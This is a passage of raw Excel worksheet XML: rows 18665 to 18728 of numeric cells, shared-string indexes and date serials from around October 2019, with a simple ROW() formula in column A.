    </row>
    <row r="18665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18665">
        <f t="shared" si="291"/>
        <v>18664</v>
      </c>
      <c r="B18665">
        <v>3664</v>
      </c>
      <c r="C18665" t="s">
        <v>25497</v>
      </c>
      <c r="D18665" s="1">
        <v>43748</v>
      </c>
      <c r="F18665" t="s">
        <v>9975</v>
      </c>
      <c r="G18665" t="s">
        <v>30217</v>
      </c>
    </row>
    <row r="18666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18666">
        <f t="shared" si="291"/>
        <v>18665</v>
      </c>
      <c r="B18666">
        <v>3665</v>
      </c>
      <c r="C18666" t="s">
        <v>25497</v>
      </c>
      <c r="D18666" s="1">
        <v>43753</v>
      </c>
      <c r="F18666" t="s">
        <v>9975</v>
      </c>
      <c r="G18666" t="s">
        <v>30218</v>
      </c>
    </row>
    <row r="18667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18667">
        <f t="shared" si="291"/>
        <v>18666</v>
      </c>
      <c r="B18667">
        <v>3666</v>
      </c>
      <c r="C18667" t="s">
        <v>25497</v>
      </c>
      <c r="D18667" s="1">
        <v>43742</v>
      </c>
      <c r="E18667" t="s">
        <v>30219</v>
      </c>
      <c r="F18667" t="s">
        <v>9978</v>
      </c>
      <c r="G18667" t="s">
        <v>30220</v>
      </c>
    </row>
    <row r="18668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18668">
        <f t="shared" si="291"/>
        <v>18667</v>
      </c>
      <c r="B18668">
        <v>3667</v>
      </c>
      <c r="C18668" t="s">
        <v>25497</v>
      </c>
      <c r="D18668" s="1">
        <v>43739</v>
      </c>
      <c r="E18668" t="s">
        <v>30221</v>
      </c>
      <c r="F18668" t="s">
        <v>10526</v>
      </c>
      <c r="G18668" t="s">
        <v>30222</v>
      </c>
    </row>
    <row r="18669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18669">
        <f t="shared" si="291"/>
        <v>18668</v>
      </c>
      <c r="B18669">
        <v>3668</v>
      </c>
      <c r="C18669" t="s">
        <v>25497</v>
      </c>
      <c r="D18669" s="1">
        <v>43740</v>
      </c>
      <c r="E18669" t="s">
        <v>25642</v>
      </c>
      <c r="F18669" t="s">
        <v>9975</v>
      </c>
      <c r="G18669" t="s">
        <v>30223</v>
      </c>
    </row>
    <row r="18670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18670">
        <f t="shared" si="291"/>
        <v>18669</v>
      </c>
      <c r="B18670">
        <v>3669</v>
      </c>
      <c r="C18670" t="s">
        <v>25497</v>
      </c>
      <c r="D18670" s="1">
        <v>43741</v>
      </c>
      <c r="F18670" t="s">
        <v>10526</v>
      </c>
      <c r="G18670" t="s">
        <v>30224</v>
      </c>
    </row>
    <row r="18671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18671">
        <f t="shared" si="291"/>
        <v>18670</v>
      </c>
      <c r="B18671">
        <v>3670</v>
      </c>
      <c r="C18671" t="s">
        <v>25497</v>
      </c>
      <c r="D18671" s="1">
        <v>43747</v>
      </c>
      <c r="E18671" t="s">
        <v>30225</v>
      </c>
      <c r="F18671" t="s">
        <v>9975</v>
      </c>
      <c r="G18671" t="s">
        <v>30226</v>
      </c>
    </row>
    <row r="18672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18672">
        <f t="shared" si="291"/>
        <v>18671</v>
      </c>
      <c r="B18672">
        <v>3671</v>
      </c>
      <c r="C18672" t="s">
        <v>25497</v>
      </c>
      <c r="D18672" s="1">
        <v>43749</v>
      </c>
      <c r="F18672" t="s">
        <v>10021</v>
      </c>
      <c r="G18672" t="s">
        <v>30227</v>
      </c>
    </row>
    <row r="18673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18673">
        <f t="shared" si="291"/>
        <v>18672</v>
      </c>
      <c r="B18673">
        <v>3672</v>
      </c>
      <c r="C18673" t="s">
        <v>25497</v>
      </c>
      <c r="D18673" s="1">
        <v>43741</v>
      </c>
      <c r="F18673" t="s">
        <v>9975</v>
      </c>
      <c r="G18673" t="s">
        <v>30228</v>
      </c>
    </row>
    <row r="18674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18674">
        <f t="shared" si="291"/>
        <v>18673</v>
      </c>
      <c r="B18674">
        <v>3673</v>
      </c>
      <c r="C18674" t="s">
        <v>25497</v>
      </c>
      <c r="D18674" s="1">
        <v>43745</v>
      </c>
      <c r="F18674" t="s">
        <v>9975</v>
      </c>
      <c r="G18674" t="s">
        <v>30229</v>
      </c>
    </row>
    <row r="18675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18675">
        <f t="shared" si="291"/>
        <v>18674</v>
      </c>
      <c r="B18675">
        <v>3674</v>
      </c>
      <c r="C18675" t="s">
        <v>25497</v>
      </c>
      <c r="D18675" s="1">
        <v>43746</v>
      </c>
      <c r="F18675" t="s">
        <v>9975</v>
      </c>
      <c r="G18675" t="s">
        <v>30230</v>
      </c>
    </row>
    <row r="18676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18676">
        <f t="shared" si="291"/>
        <v>18675</v>
      </c>
      <c r="B18676">
        <v>3675</v>
      </c>
      <c r="C18676" t="s">
        <v>25497</v>
      </c>
      <c r="D18676" s="1">
        <v>43754</v>
      </c>
      <c r="E18676" t="s">
        <v>25512</v>
      </c>
      <c r="F18676" t="s">
        <v>9975</v>
      </c>
      <c r="G18676" t="s">
        <v>30231</v>
      </c>
    </row>
    <row r="18677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18677">
        <f t="shared" si="291"/>
        <v>18676</v>
      </c>
      <c r="B18677">
        <v>3676</v>
      </c>
      <c r="C18677" t="s">
        <v>25497</v>
      </c>
      <c r="D18677" s="1">
        <v>43748</v>
      </c>
      <c r="E18677" t="s">
        <v>25517</v>
      </c>
      <c r="F18677" t="s">
        <v>9975</v>
      </c>
      <c r="G18677" t="s">
        <v>30232</v>
      </c>
    </row>
    <row r="18678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18678">
        <f t="shared" si="291"/>
        <v>18677</v>
      </c>
      <c r="B18678">
        <v>3677</v>
      </c>
      <c r="C18678" t="s">
        <v>25497</v>
      </c>
      <c r="D18678" s="1">
        <v>43754</v>
      </c>
      <c r="E18678" t="s">
        <v>30233</v>
      </c>
      <c r="F18678" t="s">
        <v>9975</v>
      </c>
      <c r="G18678" t="s">
        <v>30234</v>
      </c>
    </row>
    <row r="18679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18679">
        <f t="shared" si="291"/>
        <v>18678</v>
      </c>
      <c r="B18679">
        <v>3678</v>
      </c>
      <c r="C18679" t="s">
        <v>25497</v>
      </c>
      <c r="D18679" s="1">
        <v>43753</v>
      </c>
      <c r="E18679" t="s">
        <v>25517</v>
      </c>
      <c r="F18679" t="s">
        <v>9975</v>
      </c>
      <c r="G18679" t="s">
        <v>30235</v>
      </c>
    </row>
    <row r="18680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18680">
        <f t="shared" si="291"/>
        <v>18679</v>
      </c>
      <c r="B18680">
        <v>3679</v>
      </c>
      <c r="C18680" t="s">
        <v>25497</v>
      </c>
      <c r="D18680" s="1">
        <v>43741</v>
      </c>
      <c r="E18680" t="s">
        <v>25517</v>
      </c>
      <c r="F18680" t="s">
        <v>9975</v>
      </c>
      <c r="G18680" t="s">
        <v>30236</v>
      </c>
    </row>
    <row r="18681" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18681">
        <f t="shared" si="291"/>
        <v>18680</v>
      </c>
      <c r="B18681">
        <v>3680</v>
      </c>
      <c r="C18681" t="s">
        <v>25497</v>
      </c>
      <c r="D18681" s="1">
        <v>43755</v>
      </c>
      <c r="F18681" t="s">
        <v>9975</v>
      </c>
      <c r="G18681" t="s">
        <v>30237</v>
      </c>
    </row>
    <row r="18682" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18682">
        <f t="shared" si="291"/>
        <v>18681</v>
      </c>
      <c r="B18682">
        <v>3681</v>
      </c>
      <c r="C18682" t="s">
        <v>25497</v>
      </c>
      <c r="D18682" s="1">
        <v>43748</v>
      </c>
      <c r="E18682" t="s">
        <v>25502</v>
      </c>
      <c r="F18682" t="s">
        <v>9975</v>
      </c>
      <c r="G18682" t="s">
        <v>30238</v>
      </c>
    </row>
    <row r="18683" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18683">
        <f t="shared" si="291"/>
        <v>18682</v>
      </c>
      <c r="B18683">
        <v>3682</v>
      </c>
      <c r="C18683" t="s">
        <v>25497</v>
      </c>
      <c r="D18683" s="1">
        <v>43753</v>
      </c>
      <c r="F18683" t="s">
        <v>9975</v>
      </c>
      <c r="G18683" t="s">
        <v>30239</v>
      </c>
    </row>
    <row r="18684" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18684">
        <f t="shared" si="291"/>
        <v>18683</v>
      </c>
      <c r="B18684">
        <v>3683</v>
      </c>
      <c r="C18684" t="s">
        <v>25497</v>
      </c>
      <c r="D18684" s="1">
        <v>43747</v>
      </c>
      <c r="E18684" t="s">
        <v>30240</v>
      </c>
      <c r="F18684" t="s">
        <v>10021</v>
      </c>
      <c r="G18684" t="s">
        <v>30241</v>
      </c>
    </row>
    <row r="18685" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18685">
        <f t="shared" si="291"/>
        <v>18684</v>
      </c>
      <c r="B18685">
        <v>3684</v>
      </c>
      <c r="C18685" t="s">
        <v>25497</v>
      </c>
      <c r="D18685" s="1">
        <v>43748</v>
      </c>
      <c r="F18685" t="s">
        <v>9975</v>
      </c>
      <c r="G18685" t="s">
        <v>29736</v>
      </c>
    </row>
    <row r="18686" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18686">
        <f t="shared" si="291"/>
        <v>18685</v>
      </c>
      <c r="B18686">
        <v>3685</v>
      </c>
      <c r="C18686" t="s">
        <v>25497</v>
      </c>
      <c r="D18686" s="1">
        <v>43750</v>
      </c>
      <c r="E18686" t="s">
        <v>25509</v>
      </c>
      <c r="F18686" t="s">
        <v>10021</v>
      </c>
      <c r="G18686" t="s">
        <v>30242</v>
      </c>
    </row>
    <row r="18687" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18687">
        <f t="shared" si="291"/>
        <v>18686</v>
      </c>
      <c r="B18687">
        <v>3686</v>
      </c>
      <c r="C18687" t="s">
        <v>25497</v>
      </c>
      <c r="D18687" s="1">
        <v>43742</v>
      </c>
      <c r="F18687" t="s">
        <v>9975</v>
      </c>
      <c r="G18687" t="s">
        <v>30243</v>
      </c>
    </row>
    <row r="18688" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18688">
        <f t="shared" si="291"/>
        <v>18687</v>
      </c>
      <c r="B18688">
        <v>3687</v>
      </c>
      <c r="C18688" t="s">
        <v>25497</v>
      </c>
      <c r="D18688" s="1">
        <v>43749</v>
      </c>
      <c r="E18688" t="s">
        <v>30244</v>
      </c>
      <c r="F18688" t="s">
        <v>9975</v>
      </c>
      <c r="G18688" t="s">
        <v>30245</v>
      </c>
    </row>
    <row r="18689" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18689">
        <f t="shared" si="291"/>
        <v>18688</v>
      </c>
      <c r="B18689">
        <v>3688</v>
      </c>
      <c r="C18689" t="s">
        <v>25497</v>
      </c>
      <c r="D18689" s="1">
        <v>43747</v>
      </c>
      <c r="E18689" t="s">
        <v>25509</v>
      </c>
      <c r="F18689" t="s">
        <v>9975</v>
      </c>
      <c r="G18689" t="s">
        <v>30246</v>
      </c>
    </row>
    <row r="18690" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18690">
        <f t="shared" si="291"/>
        <v>18689</v>
      </c>
      <c r="B18690">
        <v>3689</v>
      </c>
      <c r="C18690" t="s">
        <v>25497</v>
      </c>
      <c r="D18690" s="1">
        <v>43754</v>
      </c>
      <c r="E18690" t="s">
        <v>28748</v>
      </c>
      <c r="F18690" t="s">
        <v>9975</v>
      </c>
      <c r="G18690" t="s">
        <v>30247</v>
      </c>
    </row>
    <row r="18691" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18691">
        <f t="shared" ref="A18691:A18754" si="292">+ROW(A18690)</f>
        <v>18690</v>
      </c>
      <c r="B18691">
        <v>3690</v>
      </c>
      <c r="C18691" t="s">
        <v>25497</v>
      </c>
      <c r="D18691" s="1">
        <v>43740</v>
      </c>
      <c r="E18691" t="s">
        <v>25509</v>
      </c>
      <c r="F18691" t="s">
        <v>9975</v>
      </c>
      <c r="G18691" t="s">
        <v>30248</v>
      </c>
    </row>
    <row r="18692" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18692">
        <f t="shared" si="292"/>
        <v>18691</v>
      </c>
      <c r="B18692">
        <v>3691</v>
      </c>
      <c r="C18692" t="s">
        <v>25497</v>
      </c>
      <c r="D18692" s="1">
        <v>43752</v>
      </c>
      <c r="E18692" t="s">
        <v>30249</v>
      </c>
      <c r="F18692" t="s">
        <v>9975</v>
      </c>
      <c r="G18692" t="s">
        <v>30250</v>
      </c>
    </row>
    <row r="18693" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18693">
        <f t="shared" si="292"/>
        <v>18692</v>
      </c>
      <c r="B18693">
        <v>3692</v>
      </c>
      <c r="C18693" t="s">
        <v>25497</v>
      </c>
      <c r="D18693" s="1">
        <v>43739</v>
      </c>
      <c r="F18693" t="s">
        <v>10021</v>
      </c>
      <c r="G18693" t="s">
        <v>30251</v>
      </c>
    </row>
    <row r="18694" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18694">
        <f t="shared" si="292"/>
        <v>18693</v>
      </c>
      <c r="B18694">
        <v>3693</v>
      </c>
      <c r="C18694" t="s">
        <v>25497</v>
      </c>
      <c r="D18694" s="1">
        <v>43748</v>
      </c>
      <c r="F18694" t="s">
        <v>9975</v>
      </c>
      <c r="G18694" t="s">
        <v>30252</v>
      </c>
    </row>
    <row r="18695" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18695">
        <f t="shared" si="292"/>
        <v>18694</v>
      </c>
      <c r="B18695">
        <v>3694</v>
      </c>
      <c r="C18695" t="s">
        <v>25497</v>
      </c>
      <c r="D18695" s="1">
        <v>43746</v>
      </c>
      <c r="E18695" t="s">
        <v>25584</v>
      </c>
      <c r="F18695" t="s">
        <v>9975</v>
      </c>
      <c r="G18695" t="s">
        <v>30253</v>
      </c>
    </row>
    <row r="18696" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18696">
        <f t="shared" si="292"/>
        <v>18695</v>
      </c>
      <c r="B18696">
        <v>3695</v>
      </c>
      <c r="C18696" t="s">
        <v>25497</v>
      </c>
      <c r="D18696" s="1">
        <v>43746</v>
      </c>
      <c r="F18696" t="s">
        <v>9975</v>
      </c>
      <c r="G18696" t="s">
        <v>30254</v>
      </c>
    </row>
    <row r="18697" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18697">
        <f t="shared" si="292"/>
        <v>18696</v>
      </c>
      <c r="B18697">
        <v>3696</v>
      </c>
      <c r="C18697" t="s">
        <v>25497</v>
      </c>
      <c r="D18697" s="1">
        <v>43740</v>
      </c>
      <c r="F18697" t="s">
        <v>9975</v>
      </c>
      <c r="G18697" t="s">
        <v>30255</v>
      </c>
    </row>
    <row r="18698" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18698">
        <f t="shared" si="292"/>
        <v>18697</v>
      </c>
      <c r="B18698">
        <v>3697</v>
      </c>
      <c r="C18698" t="s">
        <v>25497</v>
      </c>
      <c r="D18698" s="1">
        <v>43754</v>
      </c>
      <c r="F18698" t="s">
        <v>9975</v>
      </c>
      <c r="G18698" t="s">
        <v>30256</v>
      </c>
    </row>
    <row r="18699" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18699">
        <f t="shared" si="292"/>
        <v>18698</v>
      </c>
      <c r="B18699">
        <v>3698</v>
      </c>
      <c r="C18699" t="s">
        <v>25497</v>
      </c>
      <c r="D18699" s="1">
        <v>43742</v>
      </c>
      <c r="F18699" t="s">
        <v>10526</v>
      </c>
      <c r="G18699" t="s">
        <v>30257</v>
      </c>
    </row>
    <row r="18700" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18700">
        <f t="shared" si="292"/>
        <v>18699</v>
      </c>
      <c r="B18700">
        <v>3699</v>
      </c>
      <c r="C18700" t="s">
        <v>25497</v>
      </c>
      <c r="D18700" s="1">
        <v>43749</v>
      </c>
      <c r="F18700" t="s">
        <v>9975</v>
      </c>
      <c r="G18700" t="s">
        <v>30258</v>
      </c>
    </row>
    <row r="18701" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18701">
        <f t="shared" si="292"/>
        <v>18700</v>
      </c>
      <c r="B18701">
        <v>3700</v>
      </c>
      <c r="C18701" t="s">
        <v>25497</v>
      </c>
      <c r="D18701" s="1">
        <v>43742</v>
      </c>
      <c r="E18701" t="s">
        <v>26957</v>
      </c>
      <c r="F18701" t="s">
        <v>9975</v>
      </c>
      <c r="G18701" t="s">
        <v>30259</v>
      </c>
    </row>
    <row r="18702" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18702">
        <f t="shared" si="292"/>
        <v>18701</v>
      </c>
      <c r="B18702">
        <v>3701</v>
      </c>
      <c r="C18702" t="s">
        <v>25497</v>
      </c>
      <c r="D18702" s="1">
        <v>43748</v>
      </c>
      <c r="E18702" t="s">
        <v>25517</v>
      </c>
      <c r="F18702" t="s">
        <v>9975</v>
      </c>
      <c r="G18702" t="s">
        <v>30260</v>
      </c>
    </row>
    <row r="18703" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18703">
        <f t="shared" si="292"/>
        <v>18702</v>
      </c>
      <c r="B18703">
        <v>3702</v>
      </c>
      <c r="C18703" t="s">
        <v>25497</v>
      </c>
      <c r="D18703" s="1">
        <v>43739</v>
      </c>
      <c r="E18703" t="s">
        <v>25517</v>
      </c>
      <c r="F18703" t="s">
        <v>9975</v>
      </c>
      <c r="G18703" t="s">
        <v>30261</v>
      </c>
    </row>
    <row r="18704" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18704">
        <f t="shared" si="292"/>
        <v>18703</v>
      </c>
      <c r="B18704">
        <v>3703</v>
      </c>
      <c r="C18704" t="s">
        <v>25497</v>
      </c>
      <c r="D18704" s="1">
        <v>43740</v>
      </c>
      <c r="F18704" t="s">
        <v>9975</v>
      </c>
      <c r="G18704" t="s">
        <v>30262</v>
      </c>
    </row>
    <row r="18705" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18705">
        <f t="shared" si="292"/>
        <v>18704</v>
      </c>
      <c r="B18705">
        <v>3704</v>
      </c>
      <c r="C18705" t="s">
        <v>25497</v>
      </c>
      <c r="D18705" s="1">
        <v>43741</v>
      </c>
      <c r="E18705" t="s">
        <v>30263</v>
      </c>
      <c r="F18705" t="s">
        <v>9975</v>
      </c>
      <c r="G18705" t="s">
        <v>30264</v>
      </c>
    </row>
    <row r="18706" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18706">
        <f t="shared" si="292"/>
        <v>18705</v>
      </c>
      <c r="B18706">
        <v>3705</v>
      </c>
      <c r="C18706" t="s">
        <v>25497</v>
      </c>
      <c r="D18706" s="1">
        <v>43746</v>
      </c>
      <c r="E18706" t="s">
        <v>25517</v>
      </c>
      <c r="F18706" t="s">
        <v>9975</v>
      </c>
      <c r="G18706" t="s">
        <v>30265</v>
      </c>
    </row>
    <row r="18707" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18707">
        <f t="shared" si="292"/>
        <v>18706</v>
      </c>
      <c r="B18707">
        <v>3706</v>
      </c>
      <c r="C18707" t="s">
        <v>25497</v>
      </c>
      <c r="D18707" s="1">
        <v>43743</v>
      </c>
      <c r="E18707" t="s">
        <v>26785</v>
      </c>
      <c r="F18707" t="s">
        <v>9975</v>
      </c>
      <c r="G18707" t="s">
        <v>30266</v>
      </c>
    </row>
    <row r="18708" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18708">
        <f t="shared" si="292"/>
        <v>18707</v>
      </c>
      <c r="B18708">
        <v>3707</v>
      </c>
      <c r="C18708" t="s">
        <v>25497</v>
      </c>
      <c r="D18708" s="1">
        <v>43751</v>
      </c>
      <c r="E18708" t="s">
        <v>30267</v>
      </c>
      <c r="F18708" t="s">
        <v>9975</v>
      </c>
      <c r="G18708" t="s">
        <v>30268</v>
      </c>
    </row>
    <row r="18709" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18709">
        <f t="shared" si="292"/>
        <v>18708</v>
      </c>
      <c r="B18709">
        <v>3708</v>
      </c>
      <c r="C18709" t="s">
        <v>25497</v>
      </c>
      <c r="D18709" s="1">
        <v>43746</v>
      </c>
      <c r="F18709" t="s">
        <v>9975</v>
      </c>
      <c r="G18709" t="s">
        <v>30269</v>
      </c>
    </row>
    <row r="18710" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18710">
        <f t="shared" si="292"/>
        <v>18709</v>
      </c>
      <c r="B18710">
        <v>3709</v>
      </c>
      <c r="C18710" t="s">
        <v>25497</v>
      </c>
      <c r="D18710" s="1">
        <v>43751</v>
      </c>
      <c r="E18710" t="s">
        <v>30270</v>
      </c>
      <c r="F18710" t="s">
        <v>9975</v>
      </c>
      <c r="G18710" t="s">
        <v>30271</v>
      </c>
    </row>
    <row r="18711" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18711">
        <f t="shared" si="292"/>
        <v>18710</v>
      </c>
      <c r="B18711">
        <v>3710</v>
      </c>
      <c r="C18711" t="s">
        <v>25497</v>
      </c>
      <c r="D18711" s="1">
        <v>43741</v>
      </c>
      <c r="F18711" t="s">
        <v>9975</v>
      </c>
      <c r="G18711" t="s">
        <v>30272</v>
      </c>
    </row>
    <row r="18712" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18712">
        <f t="shared" si="292"/>
        <v>18711</v>
      </c>
      <c r="B18712">
        <v>3711</v>
      </c>
      <c r="C18712" t="s">
        <v>25497</v>
      </c>
      <c r="D18712" s="1">
        <v>43742</v>
      </c>
      <c r="E18712" t="s">
        <v>30273</v>
      </c>
      <c r="F18712" t="s">
        <v>9975</v>
      </c>
      <c r="G18712" t="s">
        <v>30274</v>
      </c>
    </row>
    <row r="18713" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18713">
        <f t="shared" si="292"/>
        <v>18712</v>
      </c>
      <c r="B18713">
        <v>3712</v>
      </c>
      <c r="C18713" t="s">
        <v>25497</v>
      </c>
      <c r="D18713" s="1">
        <v>43754</v>
      </c>
      <c r="F18713" t="s">
        <v>9978</v>
      </c>
      <c r="G18713" t="s">
        <v>30275</v>
      </c>
    </row>
    <row r="18714" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18714">
        <f t="shared" si="292"/>
        <v>18713</v>
      </c>
      <c r="B18714">
        <v>3713</v>
      </c>
      <c r="C18714" t="s">
        <v>25497</v>
      </c>
      <c r="D18714" s="1">
        <v>43741</v>
      </c>
      <c r="F18714" t="s">
        <v>10021</v>
      </c>
      <c r="G18714" t="s">
        <v>30276</v>
      </c>
    </row>
    <row r="18715" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18715">
        <f t="shared" si="292"/>
        <v>18714</v>
      </c>
      <c r="B18715">
        <v>3714</v>
      </c>
      <c r="C18715" t="s">
        <v>25497</v>
      </c>
      <c r="D18715" s="1">
        <v>43741</v>
      </c>
      <c r="E18715" t="s">
        <v>30277</v>
      </c>
      <c r="F18715" t="s">
        <v>10526</v>
      </c>
      <c r="G18715" t="s">
        <v>30278</v>
      </c>
    </row>
    <row r="18716" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18716">
        <f t="shared" si="292"/>
        <v>18715</v>
      </c>
      <c r="B18716">
        <v>3715</v>
      </c>
      <c r="C18716" t="s">
        <v>25497</v>
      </c>
      <c r="D18716" s="1">
        <v>43752</v>
      </c>
      <c r="E18716" t="s">
        <v>30279</v>
      </c>
      <c r="F18716" t="s">
        <v>9975</v>
      </c>
      <c r="G18716" t="s">
        <v>30280</v>
      </c>
    </row>
    <row r="18717" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18717">
        <f t="shared" si="292"/>
        <v>18716</v>
      </c>
      <c r="B18717">
        <v>3716</v>
      </c>
      <c r="C18717" t="s">
        <v>25497</v>
      </c>
      <c r="D18717" s="1">
        <v>43750</v>
      </c>
      <c r="E18717" t="s">
        <v>25886</v>
      </c>
      <c r="F18717" t="s">
        <v>9975</v>
      </c>
      <c r="G18717" t="s">
        <v>30281</v>
      </c>
    </row>
    <row r="18718" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18718">
        <f t="shared" si="292"/>
        <v>18717</v>
      </c>
      <c r="B18718">
        <v>3717</v>
      </c>
      <c r="C18718" t="s">
        <v>25497</v>
      </c>
      <c r="D18718" s="1">
        <v>43752</v>
      </c>
      <c r="E18718" t="s">
        <v>26178</v>
      </c>
      <c r="F18718" t="s">
        <v>9975</v>
      </c>
      <c r="G18718" t="s">
        <v>30282</v>
      </c>
    </row>
    <row r="18719" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18719">
        <f t="shared" si="292"/>
        <v>18718</v>
      </c>
      <c r="B18719">
        <v>3718</v>
      </c>
      <c r="C18719" t="s">
        <v>25497</v>
      </c>
      <c r="D18719" s="1">
        <v>43757</v>
      </c>
      <c r="E18719" t="s">
        <v>30283</v>
      </c>
      <c r="F18719" t="s">
        <v>10526</v>
      </c>
      <c r="G18719" t="s">
        <v>30284</v>
      </c>
    </row>
    <row r="18720" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18720">
        <f t="shared" si="292"/>
        <v>18719</v>
      </c>
      <c r="B18720">
        <v>3719</v>
      </c>
      <c r="C18720" t="s">
        <v>25497</v>
      </c>
      <c r="D18720" s="1">
        <v>43749</v>
      </c>
      <c r="E18720" t="s">
        <v>30285</v>
      </c>
      <c r="F18720" t="s">
        <v>9975</v>
      </c>
      <c r="G18720" t="s">
        <v>30286</v>
      </c>
    </row>
    <row r="18721" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18721">
        <f t="shared" si="292"/>
        <v>18720</v>
      </c>
      <c r="B18721">
        <v>3720</v>
      </c>
      <c r="C18721" t="s">
        <v>25497</v>
      </c>
      <c r="D18721" s="1">
        <v>43746</v>
      </c>
      <c r="E18721" t="s">
        <v>25512</v>
      </c>
      <c r="F18721" t="s">
        <v>9975</v>
      </c>
      <c r="G18721" t="s">
        <v>30287</v>
      </c>
    </row>
    <row r="18722" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18722">
        <f t="shared" si="292"/>
        <v>18721</v>
      </c>
      <c r="B18722">
        <v>3721</v>
      </c>
      <c r="C18722" t="s">
        <v>25497</v>
      </c>
      <c r="D18722" s="1">
        <v>43753</v>
      </c>
      <c r="F18722" t="s">
        <v>9975</v>
      </c>
      <c r="G18722" t="s">
        <v>30288</v>
      </c>
    </row>
    <row r="18723" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18723">
        <f t="shared" si="292"/>
        <v>18722</v>
      </c>
      <c r="B18723">
        <v>3722</v>
      </c>
      <c r="C18723" t="s">
        <v>25497</v>
      </c>
      <c r="D18723" s="1">
        <v>43744</v>
      </c>
      <c r="E18723" t="s">
        <v>26513</v>
      </c>
      <c r="F18723" t="s">
        <v>9975</v>
      </c>
      <c r="G18723" t="s">
        <v>30289</v>
      </c>
    </row>
    <row r="18724" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18724">
        <f t="shared" si="292"/>
        <v>18723</v>
      </c>
      <c r="B18724">
        <v>3723</v>
      </c>
      <c r="C18724" t="s">
        <v>25497</v>
      </c>
      <c r="D18724" s="1">
        <v>43752</v>
      </c>
      <c r="E18724" t="s">
        <v>30290</v>
      </c>
      <c r="F18724" t="s">
        <v>9975</v>
      </c>
      <c r="G18724" t="s">
        <v>30291</v>
      </c>
    </row>
    <row r="18725" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18725">
        <f t="shared" si="292"/>
        <v>18724</v>
      </c>
      <c r="B18725">
        <v>3724</v>
      </c>
      <c r="C18725" t="s">
        <v>25497</v>
      </c>
      <c r="D18725" s="1">
        <v>43749</v>
      </c>
      <c r="E18725" t="s">
        <v>30292</v>
      </c>
      <c r="F18725" t="s">
        <v>9975</v>
      </c>
      <c r="G18725" t="s">
        <v>30293</v>
      </c>
    </row>
    <row r="18726" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18726">
        <f t="shared" si="292"/>
        <v>18725</v>
      </c>
      <c r="B18726">
        <v>3725</v>
      </c>
      <c r="C18726" t="s">
        <v>25497</v>
      </c>
      <c r="D18726" s="1">
        <v>43747</v>
      </c>
      <c r="F18726" t="s">
        <v>9975</v>
      </c>
      <c r="G18726" t="s">
        <v>30294</v>
      </c>
    </row>
    <row r="18727" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18727">
        <f t="shared" si="292"/>
        <v>18726</v>
      </c>
      <c r="B18727">
        <v>3726</v>
      </c>
      <c r="C18727" t="s">
        <v>25497</v>
      </c>
      <c r="D18727" s="1">
        <v>43745</v>
      </c>
      <c r="F18727" t="s">
        <v>10021</v>
      </c>
      <c r="G18727" t="s">
        <v>30295</v>
      </c>
    </row>
    <row r="18728" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18728">
        <f t="shared" si="292"/>
        <v>18727</v>
      </c>
      <c r="B18728">
        <v>3727</v>
      </c>
      <c r="C18728" t="s">
        <v>25497</v>
      </c>
      <c r="D18728" s="1">
        <v>43756</v>
      </c>
      <c r="E18728" t="s">
        <v>19705</v>
      </c>
      <c r="F18728" t="s">
        <v>9975</v>
      </c>
      <c r="G18728" t="s">
